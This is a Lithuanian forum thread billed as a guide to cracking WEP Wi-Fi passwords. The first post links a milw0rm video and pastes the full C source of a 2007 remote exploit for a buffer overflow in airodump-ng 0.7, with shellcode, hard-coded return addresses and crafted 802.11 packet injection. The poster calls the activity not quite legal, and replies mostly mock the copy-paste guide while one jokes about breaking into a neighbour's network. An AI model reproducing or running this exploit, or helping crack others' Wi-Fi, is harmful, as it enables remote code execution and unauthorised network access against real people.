Pihas

Kaip lauziamas WEP slaptazodis (Interneto modemo)

Sukūrė Pihas      Gidai

Rekomenduojami pranešimai

Pihas    0

Pihas
Sukurta (redaguota)

Kas moka dirbti su linux sitema lengvai siuo video pasinaudos i klausimus neatsakineju nepatinka trinkit lauk

(Howto using aircrack-ptw WEP cracking tool)

post-2998-1207849677_thumb.jpg

 

Nuoroda: http://www.milw0rm.com/video/watch.php?id=76

 

/**

* airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit

*

* Proof of concept exploit for a stack (and heap) based

* overflow in airodump-ng. The vulnerability can be exploited

* by transmitting some specially crafted 802.11 packets to

* execute arbitrary code on any machines within range

* that are sniffing with a vulnerable version of airodump-ng.

*

* This exploit requires the lorcon 802.11 packet injection

* library, see http://802.11ninja.net for details.

*

* Compiling:

*

* gcc -o airodump-remote airodump-remote.c -lorcon

*

* Usage:

*

* ./airodump-ng <interface> <driver> <channel> <headertype> [return addr]

*

* Drivers supported by lorcon:

*

* wlan-ng, hostap, airjack, prism54, madwifing, madwifiold,

* rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw

*

* Header types:

*

* 0 - None (not tested)

* 1 - Fake prism54 header

* 2 - Fake radiotap header (not tested)

*

* Return addresses:

*

* Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934

* Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934

*

* Example usage:

*

* ./airodump-ng wlan0 prism54 11 1 0x8054934

*

* Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt

* Author: Jonathan So [ jonny [ @ ] nop-art.net ]

*

* Copyright © 2007 Jonathan So

*/

 

#include <stdio.h>

#include <stdlib.h>

#include <tx80211.h>

 

// Linux x86 sys_write shellcode. Any arbitrary shellcode should work

// here, it doesn't matter if it contains nulls. Maximum 792 bytes.

 

char shellcode[] = "\xeb\x14" // jmp get_message

 

// start:

"\x59\x31\xdb\x31\xd2\xb2"

"\x1b" // message length

"\x31\xc0\x88\x04\x11"

"\xb0\x04\xcd\x80" // sys_write

"\xb0\x01\xcd\x80" // sys_exit

 

// get_message:

"\xe8\xe7\xff\xff\xff" // call start

"Stop sniffing our network!!"; // message text

 

int main(int argc, char **argv)

{

tx80211_t tx;

tx80211_packet_t txp;

uint8_t packet[1044];

uint8_t *ppacket;

 

int headertype;

unsigned ret_addr = 0x8054934;

FILE *fp;

 

if(argc<5) {

printf("usage: %s <interface> <driver> <channel> <arptype>

[ret_addr]\n", argv[0]);

exit(1);

}

 

if(argc>5) {

ret_addr = strtoul(argv[5], NULL, 16);

}

 

headertype = atoi(argv[4]);

 

if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) !=

TX80211_ENOERR) {

fprintf(stderr, "Error initializing driver");

return 1;

}

 

if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) !=

TX80211_ENOERR) {

fprintf(stderr, "Error setting inject mode\n");

return 1;

}

 

if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) {

fprintf(stderr, "Error setting channel\n");

}

 

if (tx80211_open(&tx) < 0) {

fprintf(stderr, "Unable to open interface\n");

return 1;

}

 

txp.packet = packet;

 

// Fill packet with nops

memset(packet, 0x90, sizeof(packet));

 

switch (headertype) {

case 0:

// No arptype, just send raw packet

ppacket = packet;

break;

case 1:

// Send fake prism header

memcpy(packet+4, "\x08\x00\x00\x00", 4);

ppacket = packet + 8;

break;

case 2:

// Send fake radiotap header

packet[0] = 0;

packet[2] = 3;

ppacket = packet + 3;

break;

default:

printf("Invalid header type. Valid options are:\n");

printf(" 0 - none\n");

printf(" 1 - prism54\n");

printf(" 2 - radiotap\n");

return 1;

}

 

// set some necessary 802.11 header fields

ppacket[0] = 0xB0;

ppacket[1] = 0;

ppacket[24] = 1;

ppacket[25] = 0;

ppacket[26] = 2;

ppacket[27] = 0;

 

txp.plen = 512 + (ppacket - packet);

if (tx80211_txpacket(&tx, &txp) < txp.plen) {

fprintf(stderr, "Error sending packet 1\n");

return 1;

}

 

ppacket[26] = 4;

 

if (tx80211_txpacket(&tx, &txp) < txp.plen) {

fprintf(stderr, "Error sending packet 2\n");

return 1;

}

 

// Insert shellcode at end of nopsled

memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode));

 

// Overwrite some char*, needs to be a valid address

memcpy(ppacket+1028, &ret_addr, 4);

 

// Overwrite global variable sk_len, used as argument to memcpy

memcpy(ppacket+1032, "\x20\x05\x00\x00", 4);

 

// Return address

memcpy(ppacket+820, &ret_addr, 4);

 

ppacket[1] = 0x40;

txp.plen = 1036 + + (ppacket - packet);

 

if (tx80211_txpacket(&tx, &txp) < txp.plen) {

fprintf(stderr, "Error sending packet 3\n");

return 1;

}

 

tx80211_close(&tx);

 

return 0;

}

 

// milw0rm.com [2007-04-12]

Redagavo Pihas

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Deagle    1

Deagle
Atrašyta

Mano nuomone, jei rasomas gidas turetu jis buti LT, o ne nuorodos ir kazkoks readme.txt failo turinys..

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

dorklei    2

dorklei
Atrašyta

Jeigu tas žmogus išmano jis ir susiras tam tinklapį, o jegu neišmano tai turi būt lietuviškai paaiškinta.Čia pacopint ir nupastint bet kas gali.

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Domiuz    1

Domiuz
Atrašyta

na nepavadinciau sitos 'makalynes' gidu, jei rasomas gidas jis turi buti aiskus ir visiem suprantamas taip pat ir Lietuviu kalba... :)

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

scaryone    19

scaryone
Atrašyta (redaguota)

visai idomus tas video :) dar kaip tik su mano disturbucija :) reiks kada per ps3 pamegint . Bet cia tik dalis gido visiki naujokai juk nesupras to kad po defaultu nera wifi driveriu ubuntuos

Redagavo scaryone

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

suY    0

suY
Atrašyta

man atrodo jei zmogus sedi su linuksais jis automatishkai zhino anglu kalba :)o jei ne tai ne, ir toks gidas parashytas lietuvishkai neishprususiam kokiam vartotojuj bus dar labiau nesmagus

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

inpeace    50

inpeace
Atrašyta

gidas geras, pas ka nekreivos rankos ir linux zinios, bei yra noras lauzt kaimyna :) gal kada pravers :) dekui pihui

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

PIRATED    0

PIRATED
Atrašyta

šiaip jei jau "gidą" nusprendė "parašyti" žmogus tai turėtų bent jau ir į klausimus atsakyti, kurie iškylą "parašytam" gidui. Matosi, kad žmogus įmetė bele, kad būtų ir pats nesupranta.

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Pihas    0

Pihas
Atrašyta (redaguota)

šiaip jei jau "gidą" nusprendė "parašyti" žmogus tai turėtų bent jau ir į klausimus atsakyti, kurie iškylą "parašytam" gidui. Matosi, kad žmogus įmetė bele, kad būtų ir pats nesupranta.

Turiu tave nuliudinti deja man viskas gavosi, o neatsakinejo nenoriu kad cia visokiu snargliu privistu kurie galvotu jau esantys hakeriais beto cia nevisai legalus dalykas tai jeigu pateikiu info ir nera tikslaus aprasymo as kaip ir nieko detas

 

Beto parasiau jei kas neitema nepatinka redaguokit arba trinkit lauk as imeciau del to kad kiti nezino kur viso sito gerio ieskoti

Redagavo Pihas

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

griauciai    0

griauciai
Atrašyta

Turiu tave nuliudinti deja man viskas gavosi, o neatsakinejo nenoriu kad cia visokiu snargliu privistu kurie galvotu jau esantys hakeriais beto cia nevisai legalus dalykas tai jeigu pateikiu info ir nera tikslaus aprasymo as kaip ir nieko detas

 

Beto parasiau jei kas neitema nepatinka redaguokit arba trinkit lauk as imeciau del to kad kiti nezino kur viso sito gerio ieskoti

Ne į temą

Jei jau žmogus dirba su Linux'ais, tai manau jam susirast info tikrai nebus sunku. Ne toks jau čia ir gėris yra...

Dalintis šiuo pranešimu

Nuoroda į pranešimą
Dalintis kituose puslapiuose

Prisijunkite prie pokalbio

Jūs galite rašyti dabar, o registruotis vėliau. Jeigu turite paskyrą, prisijunkite dabar, kad rašytumėte iš savo paskyros.

Svečias
Parašykite atsakymą...

×   Įdėta kaip raiškusis tekstas.   Įdėti kaip grynąjį tekstą

  Only 75 emoji are allowed.

×   Nuorodos turinys įdėtas automatiškai.   Rodyti kaip įprastą nuorodą

×   Jūsų anksčiau įrašytas turinys buvo atkurtas.   Išvalyti redaktorių

×   You cannot paste images directly. Upload or insert images from URL.

×
Eiti į temų sąrašą